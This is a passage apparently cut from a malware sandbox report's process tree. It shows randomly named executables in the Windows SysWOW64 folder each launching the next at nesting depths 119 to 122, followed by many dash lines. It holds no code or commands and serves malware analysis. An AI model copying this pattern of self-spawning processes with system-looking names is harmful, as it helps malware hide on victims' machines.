C:\Windows\SysWOW64\Niofffqo.exeC:\Windows\system32\Niofffqo.exe119⤵PID:5416
-
C:\Windows\SysWOW64\Nlmbbapb.exeC:\Windows\system32\Nlmbbapb.exe120⤵PID:5472
-
C:\Windows\SysWOW64\Nbgjol32.exeC:\Windows\system32\Nbgjol32.exe121⤵PID:5524
-
C:\Windows\SysWOW64\Neefkg32.exeC:\Windows\system32\Neefkg32.exe122⤵PID:5596
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-